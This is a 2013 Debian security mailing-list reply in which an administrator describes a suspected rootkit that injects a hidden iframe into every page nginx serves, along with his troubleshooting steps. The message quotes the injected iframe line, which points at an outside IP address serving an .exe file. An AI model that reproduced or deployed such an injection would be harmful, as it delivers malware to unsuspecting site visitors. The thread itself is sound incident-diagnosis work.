Re: debian wheezy i386 nginx iframe rootkit

To: debian-security@lists.debian.org
Subject: Re: debian wheezy i386 nginx iframe rootkit
From: E Frank Ball III <frankb@efball.com>
Date: Wed, 11 Sep 2013 17:39:16 -0700
Message-id: <[🔎] 20130912003916.GH30351@kamajii.efball.com>
Reply-to: frankb@efball.com
In-reply-to: <[🔎] CAAr43iOJy_Q8kuU47Y+AH+v0E81vtnwYKH2f6LVvCowQaNSdyg@mail.gmail.com>
References: <[🔎] 20130911224820.GF30351@kamajii.efball.com> <[🔎] CAAr43iOJy_Q8kuU47Y+AH+v0E81vtnwYKH2f6LVvCowQaNSdyg@mail.gmail.com>

On Thu, Sep 12, 2013 at 09:13:46AM +0900, Joel Rees wrote:
 > On Thu, Sep 12, 2013 at 7:48 AM, E Frank Ball III <frankb@efball.com> wrote:
 > > Last fall there was a debian 64-bit / nginx rootkit going around,
 > > now I've been hit with what sounds similar but on 32-bit wheezy.
 > >
 > > All files served by nginx have this line inserted at the top:
 > >
 > > <iframe src= http://122.226.137.123:1111/yixi.exe width=0 height=0></iframe>
 > >
 > > I tar'd up /lib/modules/3.2.0-4-686-pae/kernel, copied it to another
 > > Debian Wheezy i386 machine in a safe environment and did a diff -r.  No
 > > difference.
 > >
 > > No ismod line in /etc/rc.local
 > >
 > > I haven't been able to find anything.  Googling doesn't show anything
 > > similar for debian wheezy i386, only sqeeze 64-bit.
 > >
 > > I was using nginx-light from dotdeb.org.  I uninstalled nginx and tried
 > > the nginx-light from debian wheezy but it made no difference.


 > 
 > Just out of curiosity, did you back up nginx and check it as well?
 > 
 > --
 > Joel Rees


No, I just uninstalled nginx from dotdeb and installed from Debian.

The webpages are all static and remain unchanged, the nginx config files
are OK.  The new line is added by some process I can't find.

The lynx webrowser shows this as the first line of the webpages:

IFRAME: http://122.226.137.123:1111/yixi.exe

It also appears in downloads using wget.
"view source" in firefox or chrome show nothing amiss.

It only appears on IPv4, not IPv6.

I do not have php installed.

The http header is completely different:

curl -I shows this:
 HTTP/1.1 200 OK
 Content-Type: text/html; charset=en_US.UTF-8
 Content-Length: 3634

When it should look more like this:
 HTTP/1.1 200 OK
 Server: nginx/1.4.2
 Date: Wed, 11 Sep 2013 23:39:48 GMT
 Content-Type: text/html; charset=en_US.UTF-8
 Content-Length: 3291
 Last-Modified: Thu, 24 Jan 2013 21:30:28 GMT
 Connection: keep-alive
 Vary: Accept-Encoding
 ETag: "5101a7f4-cdb"
 Accept-Ranges: bytes

I installed chkrootkit, rkhunter, unhide.rb and they found nothing.


   E Frank Ball          frankb@efball.com

Reply to:

Follow-Ups:
- Re: debian wheezy i386 nginx iframe rootkit
  - From: Joel Rees <joel.rees@gmail.com>
- Re: debian wheezy i386 nginx iframe rootkit
  - From: James Cloos <cloos@jhcloos.com>

References:
- debian wheezy i386 nginx iframe rootkit
  - From: E Frank Ball III <frankb@efball.com>
- Re: debian wheezy i386 nginx iframe rootkit
  - From: Joel Rees <joel.rees@gmail.com>

Prev by Date: Re: debian wheezy i386 nginx iframe rootkit
Next by Date: Re: debian wheezy i386 nginx iframe rootkit
Previous by thread: Re: debian wheezy i386 nginx iframe rootkit
Next by thread: Re: debian wheezy i386 nginx iframe rootkit
Index(es):
- Date
- Thread